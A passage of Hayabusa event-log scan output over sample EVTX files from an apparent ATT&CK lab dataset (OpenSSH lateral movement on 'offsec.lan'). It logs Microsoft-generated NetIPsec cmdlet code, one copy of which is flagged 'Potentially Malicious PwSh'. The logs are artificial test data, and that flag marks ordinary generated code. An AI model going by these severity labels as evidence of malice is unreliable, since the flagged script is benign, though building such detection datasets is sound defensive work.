$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase1AuthSet' -Alias '*' function Copy-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcess",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase1AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.515 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.518 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.520 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 